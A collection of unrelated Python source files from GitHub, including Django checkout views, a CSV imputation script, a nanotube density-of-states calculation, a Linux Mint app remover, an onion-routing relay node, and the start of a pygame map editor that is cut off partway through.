{"seq_id":"30398109564","text":"from django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import render,redirect\nfrom django.contrib.auth.decorators import login_required\nfrom . models import Order,OrderItem\nfrom carts.models import Cart\nfrom products.models import ProductItem\nfrom django.contrib import messages\nfrom accounts.models import Profile\nfrom . 
constants import PAYMENT_TYPE_RAZORPAY\nfrom .forms import AddressForm\nfrom django.db import transaction\n\nfrom products.models import Coupon_code\n#celery\nfrom .task import send_email_task\nimport random\n\n# Create your views here.\n\n#transaction.atomic !Done!\n@login_required(login_url='logIn')\ndef place_order(request):\n    \"\"\"\n    Handles checkout for both COD and Razorpay requests: validates the\n    address form, creates or updates the user's saved address, applies any\n    coupon from the session, and saves the Order and OrderItem rows inside\n    one database transaction.\n    \"\"\"\n    if request.method == 'POST':\n\n        address_form = AddressForm(request.POST)\n\n        if address_form.is_valid():\n\n            # Start a database transaction block\n            with transaction.atomic():\n                neworder = Order()\n                neworder.user = request.user\n                neworder.payment_mode = request.POST.get('payment_mode')\n                neworder.payment_id = request.POST.get('payment_id')\n\n                #FORM VALIDATION done !Done!\n                # Check if a Profile for the user exists, and create/update it\n                address, created = Profile.objects.get_or_create(user=request.user, status=True)\n\n\n                address.fname = address_form.cleaned_data['fname']\n                address.lname = address_form.cleaned_data['lname']\n                address.phone = address_form.cleaned_data['phone']\n                address.email = address_form.cleaned_data['email']\n                address.country = address_form.cleaned_data['country']\n                address.address = address_form.cleaned_data['address']\n                address.city = address_form.cleaned_data['city']\n                address.state = address_form.cleaned_data['state']\n                address.pincode = address_form.cleaned_data['pincode']\n                address.save()\n\n                #set the applied coupon code in the order\n                applied_coupon_code = request.session.get('applied_coupon', None)\n                # print(f\"Applied Coupon Code: {applied_coupon_code}\")\n                if applied_coupon_code:\n                    try:\n                        coupon = Coupon_code.objects.get(code=applied_coupon_code, active=True)\n                        # print(f\"Coupon Status: {coupon.active}\")\n                        neworder.applied_coupon = coupon\n                        # print(\"Coupon Applied to Order\")\n                    except Coupon_code.DoesNotExist:\n                        neworder.applied_coupon = None\n                        # print(\"Coupon Not Found\")\n\n                neworder.address = address\n\n\n                \n                # # TODO : remove for loop move to DB !Done!\n\n\n\n                tracking_number = generate_tracking_number(request.user)\n                neworder.tracking_no = tracking_number\n                neworder.save()\n\n                neworderitems = Cart.objects.filter(user=request.user)\n\n                # Create a list of OrderItem objects to be created in bulk\n                order_items = []\n\n                for item in neworderitems:\n                    #preparing data for OrderItem creation\n\n                    order_item_data = {\n                        'order': neworder,\n                        'product': item.product,\n                        'price': item.product.price,\n                        'quantity': item.qty,\n                        # TODO: remove total amount !Done!\n                    }\n\n                    # Append the data to the list\n                    order_items.append(OrderItem(**order_item_data))\n\n                    #decreasing product quantity from available stock\n                    # TODO: locking mechanism => reduce & bd locker !Done!\n                    orderproduct = ProductItem.objects.select_for_update().get(id=item.product.id)\n                    if orderproduct.stock >= item.qty:\n                        orderproduct.stock -= item.qty\n                        orderproduct.save()\n                    else:\n                        return JsonResponse({'error': 'Not enough stock'})\n                \n                # Clear the applied_coupon session\n                if 'applied_coupon' in request.session:\n                    del request.session['applied_coupon']\n\n                # Clear the list of applied coupons in the session\n                request.session['applied_coupons'] = []\n\n\n                # Use a database transaction for the bulk create operation\n                OrderItem.objects.bulk_create(order_items)\n\n\n                #clearing user's cart\n                Cart.objects.filter(user=request.user).delete()\n\n\n                pay_mode = request.POST.get('payment_mode')
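\n                # Razorpay orders answer the checkout AJAX call with JSON; COD orders redirect straight to the confirmation page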
\n                if (pay_mode == PAYMENT_TYPE_RAZORPAY):\n                    # TODO: translation languages\n                    send_email_task.delay(request.user.id, neworder.id)\n                    print(f\"worked {send_email_task} \")\n                    return JsonResponse({'status': 'Your Order has been placed successfully'})\n                    # return redirect(\"payment-confirmation\")\n\n                else:\n                    send_email_task.delay(request.user.id, neworder.id)\n                    messages.success(request, \"Your Order has been placed successfully\")\n                    return redirect(\"payment-confirmation\")\n\n        \n        else:\n            return JsonResponse({'error': 'Form validation failed. Return back to checkout Page'})\n\n    # return render(request, \"confirmation.html\")\n\n    #TODO admin actions on ordered items\n\n\n\n@login_required(login_url='logIn')\ndef razorpay_check(request):\n    \"\"\"\n    Returns the cart subtotal (minus any applied coupon) that the\n    Razorpay checkout should charge.\n    \"\"\"\n    cart = Cart.objects.filter(user=request.user)\n\n    subtotal = 0\n    for item in cart:\n        totalprice = item.product.price * item.qty\n        subtotal += totalprice\n\n    # Check if a coupon is applied\n    applied_coupon_code = request.session.get('applied_coupon', None)\n\n    if applied_coupon_code:\n        # Try to get the coupon or set discounted_price to subtotal\n        try:\n            coupon = Coupon_code.objects.get(code=applied_coupon_code, active=True)\n            # Apply the coupon discount to the subtotal\n            subtotal -= subtotal * coupon.discount / 100\n        except Coupon_code.DoesNotExist:\n            # If the coupon is not found, ignore it\n            pass\n\n    return JsonResponse({'subtotal': subtotal})\n\ndef generate_tracking_number(user):\n    tracking_number = f\"{user.username}-{random.randint(1111111,9999999)}\"\n    return tracking_number\n\n\n\n\ndef payment_confirmation(request):\n    \"\"\"Retrieve the user's latest order details.\"\"\"\n\n    latest_order = Order.objects.filter(user=request.user).order_by('-created_at').first()\n\n    if latest_order:\n        order_items = OrderItem.objects.filter(order=latest_order)\n        address = Profile.objects.filter(user=request.user, status=True)\n\n        context = {\n            'order': latest_order,\n            'order_items': order_items,\n            'address': address,\n        }\n        return render(request, \"confirmation.html\", context)\n    else:\n        messages.error(request, \"No order found\")\n        return redirect('/')\n\n#digital ocean,AWS\n#gitignore, readme\n\n","repo_name":"dulfackerhisham/StepWise","sub_path":"orders/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"8431190279","text":"\"\"\"URLs for the asyncmailer app.\"\"\"\nfrom compat import url\nfrom . 
import views\n\nurlpatterns = [\n    url(r'^$', views.index),\n    url(r'^index$', views.index),\n    url(r'^get_variations$', views.get_variations),\n    url(r'^get_json$', views.get_json),\n    url(r'^retrieve$', views.retrieve),\n    url(r'^presend$', views.presend),\n    url(r'^send_by_email$', views.send_by_email),\n    # append your urls here\n]\n","repo_name":"lc4t/xls-messager","sub_path":"proj/asyncmailer/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"17023389214","text":"import argparse\n\n# read the arguments from the command line\nparser = argparse.ArgumentParser()\nparser.add_argument('filename', help='input CSV file')\nparser.add_argument('--method', choices=['mean', 'median', 'mode'], default='mean', help='imputation method')\nparser.add_argument('--columns', nargs='+',default=\"\", help='columns to impute')\nparser.add_argument('--out', help='output CSV file')\n\nargs = parser.parse_args()\n\nfilename = args.filename\nmethod = args.method\ncolumns_todo = args.columns\noutput = args.out\n\nwith open(filename, 'r') as f:\n    data = f.read()\n\n# Parse the CSV string into column names and data rows\nrows = data.split('\\n')\ncolumn_names = rows[0].split(',')\ndata = [row.split(',') for row in rows[1:] if row]\nif columns_todo == '':\n    columns_todo = column_names\n\n# helper: check whether a value parses as a float\ndef is_float(x):\n    try:\n        float(x)\n        return True\n    except ValueError:\n        return False\n\n# convert numeric strings to int or float\nfor row in data:\n    for i in range(len(row)):\n        if row[i].isdigit(): \n            row[i] = int(row[i])\n        elif row[i] == '':\n            pass\n        else:\n            try:\n                row[i] = float(row[i]) \n            except ValueError:\n                pass \n\n# determine each column's data type\ndata_types = []\nfor i in range(len(column_names)):\n    col_data = [row[i] for row in data if row[i]]\n    if all(is_float(x) for x in col_data):\n        data_types.append('numeric')\n    else:\n        data_types.append('categorical')\n\n# impute missing values with the mean, median or mode\nfor i in range(len(column_names)):\n    if column_names[i] in columns_todo:\n        col_data = [row[i] for row in data if row[i]]\n        if data_types[i] == 'numeric':\n            col_data = [float(x) for x in col_data]\n            if method == 'mean':\n                if len(col_data) > 0:\n                    col_mean = sum(col_data) / len(col_data)\n                    for j in range(len(data)):\n                        if not data[j][i]:\n                            data[j][i] = col_mean\n                else:\n                    for j in range(len(data)):\n                        if not data[j][i]:\n                            data[j][i] = 0\n            elif method == 'median':\n                if len(col_data) > 0:\n                    col_median = sorted(col_data)[len(col_data) // 2]\n                    for j in range(len(data)):\n                        if not data[j][i]:\n                            data[j][i] = col_median\n                else:\n                    for j in range(len(data)):\n                        if not data[j][i]:\n                            data[j][i] = 0\n            \n        else:\n            col_data = [x for x in col_data if x]\n            if len(col_data) > 0:\n                col_mode = max(set(col_data), key=col_data.count)\n                for j in range(len(data)):\n                    if not data[j][i]:\n                        data[j][i] = col_mode\n            else:\n                for j in range(len(data)):\n                    if not data[j][i]:\n                        data[j][i] = ''\n\n\n# write the output file\ncolumn_index = []\nfor i in range(len(columns_todo)):\n    if columns_todo[i] in column_names:\n        column_index.append(column_names.index(columns_todo[i]))\nnew_data = []\nfor i in range(len(column_index)):\n    temp = []\n    for row in data:\n        temp.append(row[column_index[i]])\n    new_data.append(temp)\n\nwith open(output, 'w') as f:\n    \n    for i in range(len(columns_todo)):\n        \n        if i == len(columns_todo) - 1:\n            f.write(str(columns_todo[i]) + '\\n')\n        else:\n            f.write(str(columns_todo[i]) + ',')\n    \n    for col in range(len(new_data[0])):\n        \n        col_values = [str(row[col]) for row in new_data]
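\n        # new_data is column-major (one list per column), so element [col] of every list reassembles source row col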
\n        f.write(','.join(col_values) + '\\n')","repo_name":"Sury2511/Data-Preprocessing-and-Data-exploration","sub_path":"cau3.py","file_name":"cau3.py","file_ext":"py","file_size_in_byte":3800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"7819949562","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Mar 1 10:33:15 2022\r\n\r\n@author: Dom Dai\r\n\"\"\"\r\n\r\nfrom time import ctime\r\n\r\n# get the system time with ctime\r\n#host : \"127.0.0.1\", port = 9050\r\n#bytes(ctime(),'utf-8')\r\n#server\r\nimport socket\r\nimport sys \r\n\r\nif __name__=='__main__':\r\n    try:\r\n        sk = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\n    except socket.error as err:\r\n        print(\"Error: %s\"%str(err))\r\n        sys.exit()\r\n    print(\"Socket created\")\r\n    host = \"127.0.0.1\"\r\n    port = 9050\r\n    \r\n    # SO_REUSEADDR must be set before bind() to take effect\r\n    sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n    sk.bind((host,port))\r\n    sk.listen(5)\r\n    \r\n    while True:\r\n        print(\"waiting for client\")\r\n        client_sk,client_addr = sk.accept()\r\n        print(\"Client address: \",client_addr)\r\n        data = client_sk.recv(4096)\r\n        if not data or data.decode(\"utf-8\")!= 'time':\r\n            break\r\n        client_sk.send(bytes(ctime(),'utf-8'))\r\n        client_sk.close()\r\n    sk.close()","repo_name":"Daiappweb/CodeMang","sub_path":"LTTM/Time_Server.py","file_name":"Time_Server.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"26726372635","text":"# Code for obtaining DOS of a N-ZZNT by definition\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import integrate\n\ndef make_NZZNT_hamiltonian(k, N, alpha=1.0, beta=-2.0, a=1.0):\n\n    H = np.identity(4*N, dtype=complex) * alpha\n\n    # Upper and lower diagonal\n\n    for i in range(4*N):\n        for j in range(4*N):\n            if j == i+1 or j == i-1:\n                H[i,j] = beta\n\n    # Antidiagonal \n    for i in range(0, 2*N, 2):\n        H[i, 4*N-1-i] = beta\n        if i+1 < 2*N: \n            H[i+1, 4*N-2-i] = beta*np.exp(-1j*k*a)\n\n    for i in range(4*N-1, 2*N-1, -2):\n        H[i, 4*N-1-i] = beta\n        if i-1 >= 2*N: \n            H[i-1, 4*N-i] = beta*np.exp(1j*k*a)\n\n    # NZZNT\n\n    H[0, 2*N-1] = H[2*N-1, 0] = beta\n    H[2*N, 4*N-1] = H[4*N-1, 2*N] = beta\n    \n    return H\n\ndef diagonalize(N, hamiltonian_function):\n    k_points = 1000\n    k_array = np.linspace(-np.pi/a, np.pi/a, k_points)\n    E_array = np.zeros((k_points, 4*N))\n    \n    for idx, k in enumerate(k_array):\n        H = hamiltonian_function(k, N, alpha, beta, a)\n        E_array[idx] = np.linalg.eigvalsh(H)\n    \n    return E_array\n\n\ndef get_dos(Ek, E, eta):\n    dos = 0.0\n\n    for i in range(len(E.flatten())):\n        dos += eta / (eta**2 + (Ek - E.flatten()[i])**2)\n    \n    return dos\n\n# Obtaining energies\n\nalpha = 0.0\nbeta = -2.8\na = 1.42\n\nk_array = np.linspace(-np.pi/a, np.pi/a, 1000)\n\nE_Z9 = diagonalize(N=9, hamiltonian_function=make_NZZNT_hamiltonian)\nE_Z10 = diagonalize(N=10, hamiltonian_function=make_NZZNT_hamiltonian)\nE_Z11 = diagonalize(N=11, hamiltonian_function=make_NZZNT_hamiltonian)\n\n# Getting DOS\n\neta = 1e-2\nEk = np.linspace(-9.0, 9.0, 1000)\n\ndos_z9 = get_dos(Ek, E_Z9, eta)\ndos_z10 = get_dos(Ek, E_Z10, eta)\ndos_z11 = get_dos(Ek, E_Z11, eta)\n\n# Normalization\n\nA9 = integrate.simps(dos_z9, Ek)\nA10 = integrate.simps(dos_z10, Ek)\nA11 = integrate.simps(dos_z11, Ek)\n\n# Plotting\n\nplt.figure(figsize=(15,5))\n\nplt.subplot(1,3,1)\nplt.plot(Ek, dos_z9/A9, c='k')\nplt.xlabel('E')\nplt.ylabel('DOS')\nplt.grid(ls=':')\nplt.ylim(0, 
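# keep the same y-range on every panel so the three DOS curves are comparable\n         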
0.3)\nplt.title(f'N-ZZNT, N = 9')\n\nplt.subplot(1,3,2)\nplt.plot(Ek, dos_z10/A10, c='k')\nplt.xlabel('E')\nplt.ylabel('DOS')\nplt.grid(ls=':')\nplt.ylim(0, 0.3)\nplt.title(f'N-ZZNT, N = 10', c='k')\n\nplt.subplot(1,3,3)\nplt.plot(Ek, dos_z11/A11, c='k')\nplt.xlabel('E')\nplt.ylabel('DOS')\nplt.grid(ls=':')\nplt.ylim(0, 0.3)\nplt.title(f'N-ZZNT, N = 11')\n\nplt.show()\n","repo_name":"franklinzppa/electronic-structure","sub_path":"nanotubes/scripts/nzznt-definition-dos.py","file_name":"nzznt-definition-dos.py","file_ext":"py","file_size_in_byte":2393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17996187461","text":"#!/usr/bin/python3\n\nimport gi\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk\n\nimport sys\nimport os\nimport gettext\nimport subprocess\n\nfrom pathlib import Path\nfrom mintcommon.installer import installer\n\n# i18n\ngettext.install(\"mintinstall\", \"/usr/share/linuxmint/locale\")\n\nclass AppUninstaller:\n def __init__(self, desktopFile):\n self.desktopFile = desktopFile\n\n self.installer = installer.Installer().init(self.on_installer_ready)\n\n def on_installer_ready(self):\n pkg_name = None\n\n pkg_name = self.get_apt_name()\n\n if pkg_name is None:\n pkg_name = self.get_fp_name()\n\n if pkg_name is None:\n print(\"Package for '%s' not found\" % self.desktopFile)\n self.on_finished(None, 1)\n\n pkginfo = self.installer.find_pkginfo(pkg_name)\n\n if pkginfo and self.installer.pkginfo_is_installed(pkginfo):\n self.installer.select_pkginfo(pkginfo, self.on_installer_ready_to_remove)\n else:\n print(\"Package '%s' is not installed\" % pkginfo.name)\n self.on_finished(None, 1)\n\n def on_installer_ready_to_remove(self, task):\n self.installer.execute_task(task, self.on_finished)\n\n def get_apt_name(self):\n (status, output) = subprocess.getstatusoutput(\"dpkg -S \" + self.desktopFile)\n package = output[:output.find(\":\")].split(\",\")[0]\n\n if status == 0:\n return package\n else:\n return None\n\n def get_fp_name(self):\n path = Path(self.desktopFile)\n\n if \"flatpak\" not in path.parts:\n return None\n\n return path.stem\n\n def on_finished(self, pkginfo=None, error=None):\n Gtk.main_quit()\n\n if error:\n sys.exit(1)\n else:\n sys.exit(0)\n\nif __name__ == \"__main__\":\n\n # Exit if the given path does not exist\n if len(sys.argv) < 2 or not os.path.exists(sys.argv[1]) or not sys.argv[1].endswith(\".desktop\"):\n print(\"mintinstall-remove-app: Single argument required, the full path of a desktop file.\")\n sys.exit(1)\n\n mainwin = AppUninstaller(sys.argv[1])\n Gtk.main()\n","repo_name":"PikaOS-Linux/pkgs-baseos","sub_path":"mintinstall/mintinstall/usr/lib/linuxmint/mintinstall/mintinstall-remove-app.py","file_name":"mintinstall-remove-app.py","file_ext":"py","file_size_in_byte":2142,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"52"} +{"seq_id":"2231092584","text":"#!/usr/bin/env python3\n# coding : utf-8\n\nimport socket, pickle\nimport argparse\nimport configparser\nfrom class_cell import RelayCell, ExtendCell, CreateCell, DestroyCell \nfrom os import chmod, path\nfrom typing import List, Dict\nfrom aes_rsa import *\nfrom _thread import *\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.hazmat.primitives.asymmetric.x25519 import X25519PrivateKey\nfrom cryptography.hazmat.primitives.kdf.hkdf import HKDF\nfrom cryptography.hazmat.primitives.asymmetric import x25519\nfrom cryptography.hazmat.primitives import 
serialization\nfrom cryptography.hazmat.primitives.asymmetric import rsa\nfrom cryptography.hazmat.backends import default_backend\n\n# Init\n# ----------------------------------------------------------------\n\nCONFIG_FILE: str = \"spicy_onions.cfg\"\nIP: str = socket.gethostbyname(socket.gethostname())\n\n# Read configuration\nconfig = configparser.ConfigParser()\nconfig.read(CONFIG_FILE)\n\n# Set configuration variables\nDIR_PORT: int = int(config['DIRECTORY']['Port'])\nONION_ROUTER: str = config[\"MESSAGES\"][\"OnionRouter\"]\nSEP: str = config[\"MESSAGES\"][\"Separator\"]\nENTRANCE: str = config[\"MESSAGES\"][\"Entrance\"]\n# The keypair filenames to search for/to write to\npriv_key_file: str = config['NODE']['PrivateKeyFilename']\npub_key_file: str = config['NODE']['PublicKeyFilename']\n# The port on which we will listen\nPORT: int = int(config['DEFAULT']['Port'])\nBUFFER_SIZE: int = int(config['DEFAULT']['BufferSize'])\n\n# Known nodes\nnode_list = {}\n\n# Parse command line arguments\nparser = argparse.ArgumentParser(\n description=\"The program will detect and use already existing key if no option is specified\")\nparser.add_argument(\"-g\", \"--generate-keys\", action=\"store_true\", help=\"Generate RSA keypair of node\")\nargs = parser.parse_args()\n\n# Get node's keypair\n# ----------------------------------------------------------------\n# Check if key generation is needed\nif args.generate_keys:\n print(\"Generating RSA key pair.\")\n pub_key, priv_key = gen_rsa_key()\n\n with open(priv_key_file, 'wb') as f:\n chmod(priv_key_file, 0o600)\n f.write(priv_key)\n\n with open(pub_key_file, 'wb') as f:\n chmod(pub_key_file, 0o600)\n f.write(pub_key)\n\nelif path.exists(pub_key_file) and path.exists(priv_key_file):\n print(\"Importing RSA key pair.\")\n\n try:\n with open(pub_key_file, 'rb') as f:\n pub_key = f.read()\n with open(priv_key_file, 'rb') as f:\n priv_key = f.read()\n except:\n print(\"Importing keys failed\")\n exit()\nelse:\n parser.print_help()\n exit()\n\n# Send public key to directory\n# ----------------------------------------------------------------\nDIR_IP: str = input(\"Directory server to connect to: \")\nprint(\"Sending request to directory server.\")\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((DIR_IP, DIR_PORT))\ns.send(bytes(ONION_ROUTER + SEP, \"utf-8\") + pub_key)\ns.close()\n\n# Listen in order to get data from directory\n# ----------------------------------------------------------------\nprint(\"Listen for public keys on {}:{}\".format(IP, DIR_PORT))\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.bind((IP, DIR_PORT))\ns.listen(1)\n\nconn, addr = s.accept()\nsep_as_bytes: bytes = SEP.encode(\"UTF-8\")\ndata: List[bytes] = conn.recv(BUFFER_SIZE).split(sep_as_bytes)\nnumber_of_nodes: int = int(data[0])\ndata: List[bytes] = data[1:]\n\nprint(\"Data received from directory :\")\nfor x in range(number_of_nodes):\n node_list[data[2 * x]] = data[2 * x + 1]\n print(\"Public key of \" + data[2 * x].decode())\n\nconn.close()\ns.close()\n\n\n#Start Relay Servers\n# ----------------------------------------------------------------\n\nrs = socket.socket()\nThreadCount = 0\n\ntry:\n rs.bind((IP, PORT))\nexcept socket.error as e:\n print(str(e))\n\n# Key Creation\n# ----------------------------------------------------------------\n\nprivate_onion_key = X25519PrivateKey.generate()\npublic_onion_key = private_onion_key.public_key()\npublic_bytes = public_onion_key.public_bytes(\n encoding=serialization.Encoding.Raw,\n 
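# a raw 32-byte X25519 public key, handed to peers during the CREATE2 handshake\n    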
format=serialization.PublicFormat.Raw\n)\n\nprint('Ready for Circuit...')\nextends = 0\nrs.listen(2)\n\nbackend = default_backend()\ncircuits = []\nstreams = []\n#Circuit Creation\n# ----------------------------------------------------------------\n\ndef threaded_client(back):\n    \"\"\"\n    threaded_client(argument1)\n    \n    Name: Threaded_Client\n\n    Creates a Thread\n\n    argument1(object): Contains Data of connected Client\n    \"\"\"\n\n    proceed = True\n    while proceed:\n        data = back.recv(2048) # We get data from the predecessor\n        cell = pickle.loads(data)\n\n        proceed = process(cell)\n#Functions\n# ----------------------------------------------------------------\ndef calculate_keys(cell):\n    \"\"\"\n    calculate_keys(argument1)\n    Name: Calculate_Keys\n\n    Key derivation function. Takes object in argument1 and derives key.\n\n    argument1(object): Takes object from circuit creation and uses the value in object.hdata for key derivation\n    \"\"\"\n    #Check keys\n    #if cell.hlen == 32 :\n    peer_public = x25519.X25519PublicKey.from_public_bytes(cell.hdata)\n    shared_onion_key = private_onion_key.exchange(peer_public)\n    global derived_key\n    derived_key = HKDF(\n        algorithm=hashes.SHA256(),\n        length=32,\n        salt=None,\n        info=b'handshake data',\n        backend=backend\n    ).derive(shared_onion_key)\n    print('Shared Key:')\n    print(derived_key)\n\ndef process(cell):\n    \n    \"\"\"\n    process(argument1)\n    Name: Process\n\n    Takes cells from the connection and processes them depending on the cell type\n\n    argument1(object): Cell object for processing\n\n    \"\"\"\n\n    proceed = True\n    global extends\n    print(cell)\n    if cell.command == b'\\x00\\n': #CREATE2\n        calculate_keys(cell)\n        circuits.append(cell.circID)\n        print(\"Circuit IDs: {}\".format(circuits))\n        cell.to_created(public_bytes)\n        respond(cell)\n    elif cell.command == b'\\x00\\x0e': #EXTEND2 - 2 Scenarios\n        extends += 1\n        if extends == 1: #Needs to extend\n            connect_front(cell.lspec)\n            cell = CreateCell(cell.hdata)\n            circuits.append(cell.circID)\n            print(\"Circuit IDs: {}\".format(circuits))\n            forward(cell)\n        else: #Just forward extend\n            forward(cell)\n        cell = load_front()\n        proceed = process(cell)\n    elif cell.command == b'\\x00\\x0b': #CREATED2\n        cell.to_extended()\n        respond(cell)\n    elif cell.command == b'\\x00\\x0f': #EXTENDED2\n        respond(cell)\n    elif cell.command == b'\\x00\\x03': #RELAY // Two options\n        cell.decrypt(derived_key)\n        streams.append(cell.streamID)\n        print('Running Streams: {}'.format(streams))\n        if extends == 0: #If its the Exit Node...\n            print(cell.data)\n            connect_front(cell.data)\n            if cell.recognized == b'0' : #Check if Cell is still encrypted\n                print(\"Forwarding to Destination Server\")\n                forward(cell.payload)\n                cell = operate_endnode()\n            else: \n                print(\"Cell not recognized\")\n                print(cell.show_payload())\n        else:\n            print('forwarding relay')\n            forward(cell)\n            cell = operate_node()\n\n    elif cell.command == b'\\x00\\x04': #DESTROY\n        if extends != 0:\n            cell.set_circuit_id(circuits[1])\n            forward(cell)\n            front.close()\n        circuits.clear()\n        streams.clear()\n        print('Circuit IDs: {} & Stream IDs: {}'.format(circuits, streams))\n        proceed = False\n        back.close()\n        print('Circuit Closed!')\n    else:\n        print(cell.command)\n        print(\"Not Recognized - Dropping Cell.\")\n\n    return proceed\n\n\ndef operate_endnode():\n    \"\"\"\n    operate_endnode()\n    Name: Operate_Endnode\n\n    Function contains actions for messages on the Endnode in the Circuit\n\n    return: Relay Cell\n\n    \"\"\"\n    operate = True\n    while operate:\n        print(\"Waiting for Server\")\n        response = front.recv(1024)\n        print(\"Processing Response\")
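\n        # unpickle the destination server's reply, then onion-wrap it with this hop's shared key for the return trip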
Response\")\n resp = pickle.loads(response)\n relay = RelayCell(0, resp)\n relay.encrypt(derived_key)\n #relay.update_stream(circuit[0])\n print(\"Sending Relay\")\n respond(relay)\n print('Waiting for Client')\n relay = load_back()\n if relay.command == b'\\x00\\x04': # if Destroy\n operate = False\n else:\n relay.update_stream(streams[0])\n relay.decrypt(derived_key)\n print(relay.recognized)\n if relay.is_recognized():\n print(relay)\n forward(relay.payload)\n else:\n print(\"Relay not recognized\")\n print(relay.show_payload())\n return relay\n\ndef operate_node():\n \"\"\"\n operate_node()\n Name: Operate_Node\n\n Function contains actions for messages on the nodes in the Circuit\n\n return: Relay Cell\n\n \"\"\"\n operate = True\n while operate:\n print(\"Waiting for Server\")\n relay = load_front()\n print(\"Processing Response\")\n relay.encrypt(derived_key)\n #relay.update_stream(stream[0])\n print(\"Sending Relay\")\n respond(relay)\n print(\"Waiting for Client\")\n relay = load_back()\n if relay.command == b'\\x00\\x04': #Destroy\n operate = False\n else:\n print(relay)\n print(\"Processing Response\")\n relay.update_stream(streams[0])\n relay.decrypt(derived_key)\n forward(relay)\n return relay\n\n\ndef connect_front(ip):\n \"\"\"\n connect_front(argument1)\n Name: Connect_Front\n\n Uses the IP-adreese from argument1 to connect to the next node\n\n argument1: IP-adresse of the next node or destination\n \"\"\"\n global front\n front = socket.socket() #Initialize Socket for next Node\n try:\n front.connect((ip, PORT)) #Connect with next Node\n except error as e:\n print(str(e))\n\ndef load_back():\n \"\"\"\n load_back()\n Name: Load_Back\n\n Takes Data and converts it with pickle.\n\n return: object variable\n \"\"\"\n data = back.recv(1024)\n cell = pickle.loads(data)\n return cell\n\ndef load_front():\n \"\"\"\n load_front()\n Name: Load_Front\n\n Takes Data and converts it with pickle.\n\n return: object variable\n \"\"\"\n data = front.recv(1024)\n cell = pickle.loads(data)\n print(data)\n return cell\n\ndef respond(cell):\n \"\"\"\n respond(argument1)\n Name: Respond\n\n Converts Object with pickle and sends it\n\n argument1(object): cell object to send\n \"\"\"\n pickled_cell = pickle.dumps(cell)\n back.send(pickled_cell)\n\ndef forward(cell):\n \"\"\"\n Forward(argument1)\n Name: Forward\n\n Converts Object with pickle and sends it\n\n argument1(object): cell object to send \n \"\"\"\n pickled_cell = pickle.dumps(cell)\n front.send(pickled_cell)\n#Run Node\n#-----------------------------------------------------------\nwhile True:\n back, address = rs.accept()\n print('Connected to: ' +address[0] + ':' + str(address[1]))\n start_new_thread(threaded_client,(back, ))\n\nrs.close()\n","repo_name":"JosTorre/SpicyOnions","sub_path":"src/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":11336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17605241513","text":"'''\n1 -> select tileset\n2 -> set map dimension\n\nctrl + s -> save map\nctrl + o -> load map\n~ctrl + n -> new map\n\nf -> fill\n~g -> turn on/off gridlines\n~d -> demo mode\n~b -> fill borders\n\nleft/down -> down z level\nright/up -> up z level\n\nESC -> exit\n\n\n(on tileset)\nleft click -> select a tile (unblocked)\nright click -> select a tile (blocked)\n~left click and drag -> select multiple tiles where a left click on map places them all down from topleft\n\n(on map)\nleft click -> place a tile\nright click -> remove a tile\nleft 
\n~right click and drag -> delete tiles\n\n\n\nTHINGS TO ADD:\n\n) Undo moves (keep a log/stack of all the actions and then code how to undo actions)\n) make z levels below you slightly transparent\n) exiting should prompt to save more intelligently (asks if you scroll on map)\n) only save an image to z-img when switching from a z with something on it (just check pos_z_tile)\n) Add a demo mode where you choose where to start then you can walk around it.\n) Make a \"new map\" button, so you don't have to exit out of the program\n) be able to toggle graphics on and off\n) fill borders button\n\nKnown Bugs\n\n) makes a second entry for the same tileset if you save, exit, then load the map then open the same tileset and use it\n'''\n\nimport pygame as pg\nfrom pygame.locals import *\n\nimport tkinter as tk\nfrom tkinter import messagebox, filedialog\n\nimport os\n\n# the width/height of tiles in pixels\nTILE_RES = (32, 32)\n\n\ndef tile2rect(x_y):\n    return pg.Rect((x_y[0] * TILE_RES[0], x_y[1] * TILE_RES[1]), TILE_RES)\n\n\ndef pix2tile(x_y):\n    return int(x_y[0] / TILE_RES[0]), int(x_y[1] / TILE_RES[1])\n\n\ndef pix2tile2rect(x_y):\n    return tile2rect(pix2tile(x_y))\n\n\n# some color constants\nWHITE = (255, 255, 255)\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\nBLACK = (0, 0, 0)\nGRAY = (200, 200, 200)\n\n# some folder constants\nMAPART_DIR = \"../art/map/\"\nSAVE_DIR = \"../maps/\"\n\npg.init()\npg.display.init()\n\n\ndef runMaker():\n    #############################\n    #############################\n    #############################\n    WH = (2000, 1000)\n\n    screen = pg.display.set_mode(WH)\n    # pg.display.set_icon(pg.image.load('icon.png').convert())\n    pg.display.set_caption('Shattered Map Maker (ShaMM)')\n\n    screen.fill(GRAY)\n\n    ts_rect = pg.Rect((1, 1), (WH[0] * .25, WH[1] - 2))\n    mp_rect = pg.Rect((4 + ts_rect.width, 1), (WH[0] - 1 - 4 - ts_rect.width, WH[1] - 2))\n    ts = TS(screen.subsurface(ts_rect))\n    mp = MP(screen.subsurface(mp_rect))\n\n    pg.draw.line(screen, BLACK, (0, 0), (WH[0], 0))\n    pg.draw.line(screen, BLACK, (0, 0), (0, WH[1]))\n    pg.draw.line(screen, BLACK, (WH[0] - 1, 0), (WH[0] - 1, WH[1] - 1))\n    